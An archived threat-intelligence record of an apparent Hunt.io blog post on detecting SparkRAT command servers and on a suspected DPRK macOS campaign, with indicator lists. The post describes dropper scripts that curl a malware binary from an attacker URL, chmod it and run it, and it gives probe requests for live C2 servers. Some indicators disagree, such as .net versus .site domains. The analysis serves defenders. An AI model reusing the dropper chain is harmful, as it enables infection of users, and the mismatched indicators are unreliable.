{
	"id": "0366bf4d-8b1f-40ed-8b79-ee19e0cb9457",
	"created_at": "2026-04-06T00:22:29.156322Z",
	"updated_at": "2026-04-10T13:12:26.8355Z",
	"deleted_at": null,
	"sha1_hash": "c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89",
	"title": "Unmasking SparkRAT: Detection \u0026 macOS Campaign Insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4100205,
	"plain_text": "Unmasking SparkRAT: Detection \u0026 macOS Campaign Insights\r\nPublished: 2025-01-28 · Archived: 2026-04-05 19:05:35 UTC\r\nSparkRAT, first released on GitHub in 2022 by user XZB-1248, remains a favored tool due to its modular design, web-based user interface, and cross-platform support for Windows, macOS, and Linux systems. The malware has been\r\ndeployed as a post-exploitation tool in campaigns associated with CVE-2024-27198 and observed in cyber espionage\r\noperations targeting government organizations. In our previous post from April last year titled \"Spotting SparkRAT:\r\nDetection Tactics \u0026 Sandbox Findings\", we provided a high-level overview of the RAT, analyzing an implant and its\r\nC2 server.\r\nIn this post, we will:\r\nShare techniques on detecting SparkRAT servers in the wild.\r\nExamine a recent sighting: An extension of a suspected DPRK campaign targeting macOS users.\r\nUnderstanding SparkRAT Communications and Detection\r\nDeveloped in Golang, SparkRAT leverages the WebSocket protocol to communicate with the command-and-control\r\nserver. Following this, the malware moves to HTTP, specifically, a POST request to check for the latest version of the\r\nRAT within the repository. By default, the server listens for commands on port 8000, although this can be easily\r\nreconfigured. As we'll demonstrate below, default settings provide a valuable fingerprint for identifying SparkRAT\r\ndeployments in the wild.\r\nFigure 1: PCAP screenshot showing SparkRAT initial communications.\r\nFor those interested in real-time tracking, our Active C2s page offers scan results for more than 100 tools, both\r\nlegitimate and malicious, including SparkRAT. This feature, which we are constantly improving, provides detailed\r\nvisibility into active command-and-control infrastructure.\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 1 of 10\n\nFigure 2: Snippet of the SparkRAT servers we track in Hunt.\r\nDetection Opportunities\r\nSparkRAT employs HTTP Basic Authentication to restrict access to its C2 server panel, which requires a\r\nusername/password to be created in the configuration file to proceed. When visiting one of these pages, users will be\r\nprompted with a login prompt, which may deter further exploration by casual observers.\r\nWhen accessing a suspected web panel on the default port 8000, the HTTP response headers include the following:\r\nHTTP/1.1 401 Unauthorized\r\nWww-Authenticate: Basic realm=Authorization Required\r\n-Date\r\nContent-Length: 0\r\nNotably, standard header fields such as Server, Content-Type, and Connection are omitted, which can serve as\r\nadditional indicators to filter for potential SparkRAT deployments. As previously discussed, an upgrade check is made\r\nvia a POST request, as shown in the example below.\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 2 of 10\n\nFigure 3: Example request for an upgrade in SparkRAT.\r\nThe server expects the following in the path: /api/client/update?arch=*, along with a few other specific headers like the\r\nUser-Agent with a value of SPARK COMMIT: '', and a similar Secret field. What if we pick a single server to\r\ninvestigate (be a good internet neighbor) and send a POST request to the /api/client/update endpoint?\r\nA suspected SparkRAT server responds with the following:\r\nHTTP/1.1 400\r\nContent-Type: application/json; charset=utf-8\r\n-Date\r\nContent-Length: 52\r\nMore interestingly, the response also includes a response body for further analysis:\r\n'{\"code\":-1,\"msg\":\"${i18n|COMMON.INVALID_PARAMETER}\"}'\r\n \r\nCopy\r\nWe use some additional tricks to validate SparkRAT servers. However, combining the first response headers on port\r\n8000 and then looking for the above JSON response should be a great starting point for those looking for C2s to\r\ninvestigate/research.\r\nSuspected DPRK Campaign Persists with SparkRAT Activity\r\nIn late November 2024, researcher Germán Fernández (@1ZRR4H) highlighted a possible campaign delivering\r\nSparkRAT via fake meeting pages and domains, initially identified by @malwareHunterTeam. Around the same time,\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 3 of 10\n\nChris Duggan, @TLP_R3D, shared additional insights, including a search query and a list of IP addresses likely\r\nassociated with the activity.\r\nUsing Hunt to actively scan for RAT servers, we investigated further to identify any infrastructure that had not yet been\r\npublicly reported. Somewhat unexpectedly, our scans revealed three additional servers, each hosting open directories\r\ncontaining SparkRAT implants and exhibiting tactics consistent with those previously described.\r\nThe identified IPs, along with their ASNs, locations, and associated domains, are as follows:\r\nIP Address ASN Location Domain(s)\r\n152.32.138[.]108\r\nUCLOUD INFORMATION TECHNOLOGY (HK)\r\nLIMITED\r\nKR\r\ngsoonmann[.]site\r\ngmnormails[.]site\r\ngmoonsom[.]site\r\nnasanecesoi[.]site\r\ngmoocsoom[.]site\r\ngmcomamz[.]site\r\nnamerowem[.]site\r\ngmoosomnoem[.]site\r\nmncomgom[.]site\r\nggnmcomas[.]site\r\n15.235.130[.]160 OVH SAS SG\r\nremote.henh247[.]net\r\nupdatetiker[.]net\r\n118.194.249[.]38\r\nUCLOUD INFORMATION TECHNOLOGY (HK)\r\nLIMITED\r\nKR\r\ngomncomow[.]site\r\ngooczmmnc[.]site\r\ngnmoommle[.]space\r\nThese findings indicate that this campaign is still going strong, albeit with some differences in delivery tactics. Unlike\r\nthe previously reported activity, we observed no meeting-related domains or web pages. Additionally, at least one of the\r\nopen directories used a different path to deliver SparkRAT than previously documented. We will examine the files and\r\nopen directories uncovered in this activity in the sections below.\r\n152.32.138[.]108\r\nHosted in Seoul, South Korea, this server exhibits several characteristics frequently associated with DPRK-linked\r\ninfrastructure. These include the UCLOUD ASN, an Apache HTTPD server stack, top-level domains (TLDs) like .site,\r\n.space, and others registered under Namecheap, and Let's Encrypt TLS certificates.\r\nAn exposed directory located at /dev on port 443 contains three files and two empty subfolders. Among the files are\r\ntwo bash scripts (dev.sh and test.sh), which perform identical actions. Of note, the directory path aligns with the\r\ndownload URL mentioned in the X/Twitter post, which used /dev/ticker . The final file is client.bin, which is a\r\nSparkRAT client.\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 4 of 10\n\nFigure 4: Screenshot of the open directory at https://gmcomamz[.]site:443.\r\nBoth scripts use curl to download client.bin from the URL http://updatetiker[.]site/dev/client.bin , hosted at\r\nthe following IP to be discussed: 15.235.130[.]160. The file is saved to /Users/shared/pull.bin using the -o flag\r\nto specify the output file name and the -L flag to follow redirects. Once downloaded, chmod 777 sets full read,\r\nwrite, and execute permissions to pull.bin for all users. Finally, the renamed file is executed as a background process.\r\nFigure 5: Commands in the dev.sh file.\r\nFile Analysis: client.bin\r\nThe file client.bin (SHA-256: cd313c9b706c2ba9f50d338305c456ad3392572efe387a83093b09d2cb6f1b56) is a\r\n64-bit Mach-O binary containing numerous strings from the SparkRAT repository and detected as malicious by 16 of\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 5 of 10\n\n63 vendors. Upon execution, the malware creates and drops the file com.second.startup.plist in /Users/run, configuring\r\nit to execute every 10 minutes as part of its persistence mechanism.\r\nThe malware attempts multiple TCP connections to 51.79.218[.]159:8000, an OVH SAS server located in Singapore.\r\nAlthough the port was unresponsive during our research, port 80 hosts a webpage claiming to be an online gaming\r\nplatform, One68, aimed at Vietnamese speakers. The page's title, \"one68.top - Game Bai Dinh Cao,\" translates to\r\n\"High-Class Card Game.\" As shown in the figure below, the site features a download button for an Android APK file\r\n(one68_1_1.0.apk, SHA-256: ffe4cfde23a1ef557f7dc56f53b3713d8faa9e47ae6562b61ffa1887e5d2d56e).\r\nFigure 6: Online gaming webpage hosted on port 80 of 51.79.218[.]159.\r\nWhile our initial analysis confirms specific capabilities of the malware, such as its networking behavior, we were\r\nunable to extract a broader range of its functionalities. Further investigation into the binary is ongoing.\r\nThe APK makes a GET request to http://one68[.]top/client , and the server responds with HTTP 101 Switching\r\nProtocols indicating an upgrade to a WebSocket connection. Notably, the response includes CloudFlare-specific\r\nheaders indicating the service is used to hinder analysis and hide the above IP address.\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 6 of 10\n\nFigure 7: Screenshot of the APK GET request to the /client endpoint (Triage).\r\n15.235.130.160\r\nOur scans identified 15.235.130.160 as an active SparkRAT C2 server operating on the default port 8000\r\napproximately two weeks ago. Alongside the download domain updatetiker[.]site, the server also hosts additional\r\ndomains, including henho247[.]net and remote.henho247[.]net .\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 7 of 10\n\nFigure 8: Screenshot of the IP overview and the detected SparkRAT C2 on port 8000 (Hunt).\r\nAn open directory on this server contains files with names consistent with those observed on the previously discussed\r\nserver, such as client.bin and dev.sh, but the empty subfolders are uniquely labeled /tradem/ and /tradew/ . The\r\nclient.bin file on this system was last modified on January 10, four days later than the version hosted on the earlier\r\nserver.\r\nThe binary (SHA-256: 52277d43d2f5e8fa8c856e1c098a1ff260a956f0598e16c8fb1b38e3a9374d15) executes similarly\r\nto the earlier sample but establishes communication with the same C2 on port 8000.\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 8 of 10\n\nFigure 9: Open directory for 15.32.138.108.\r\n118.194.249[.]38\r\nWhile operational security appears to have been more carefully considered on this server, as no open directories were\r\nidentified, the final IP in our analysis resolves to three domains that align with previously observed patterns:\r\ngomncomow[.]site\r\ngooczmmnc[.]site\r\ngnmoommle[.]space\r\nWe'll continue to monitor this IP as activity has been observed on multiple ports over the past two days. Although the\r\nabsence of an open directory limits immediate analysis, its domain patterns and recent behavior suggest it remains part\r\nof the threat actors' infrastructure.\r\nConclusion\r\nSparkRAT remains a persistent threat due to its adaptability and consistent use by adversaries across platforms. The\r\nfindings in this blog highlight how a detailed analysis of its infrastructure and associated artifacts can uncover\r\nadditional activity, offering defenders valuable opportunities to monitor and disrupt these operations proactively.\r\nThe suspicious APK and its connection to a webpage mimicking a Vietnamese online gaming platform underscore the\r\nevolving tactics threat actors employ to target unsuspecting users. These techniques, coupled with SparkRAT's modular\r\ndesign and cross-platform capabilities, make it a versatile tool for adversaries seeking to achieve persistence,\r\nexfiltration, and other malicious objectives.\r\nOur research team will continue to refine our detection methods and expand our scanning beyond the default port,\r\nwhich will allow us to uncover additional SparkRAT infrastructure, ensuring the security community is equipped with\r\nactionable intelligence to combat this threat.\r\nNetwork Observables and Indicators of Compromise (IOCs)\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 9 of 10\n\nIP Address Hosting Provider Location\r\n152.32.138[.]108 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED KR\r\n15.235.130[.]160 OVH SAS SG\r\n118.194.249[.]38 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED KR\r\n51.79.218[.]159 OVH SAS SG\r\nHost Observables and Indicators of Compromise\r\nFilename SHA-256 Hash Notes\r\nclient.bin cd313c9b706c2ba9f50d338305c456ad3392572efe387a83093b09d2cb6f1b56\r\nHosted on an\r\nopen directory at\r\n152.32.138[.]108\r\nclient.bin 52277d43d2f5e8fa8c856e1c098a1ff260a956f0598e16c8fb1b38e3a9374d15\r\nFound on an\r\nexposed\r\ndirectory at\r\n15.235.130[.]160\r\none68_1_1.0.apk ffe4cfde23a1ef557f7dc56f53b3713d8faa9e47ae6562b61ffa1887e5d2d56e\r\nDownloadable\r\nfile on\r\none68[.]top\r\nSource: https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nhttps://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections"
	],
	"report_names": [
		"sparkrat-server-detection-macos-activity-and-malicious-connections"
	],
	"threat_actors": [],
	"ts_created_at": 1775434949,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89.pdf",
		"text": "https://archive.orkl.eu/c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89.txt",
		"img": "https://archive.orkl.eu/c8ae673b2a254bc3f0a8ac04c7ef91bd87888c89.jpg"
	}
}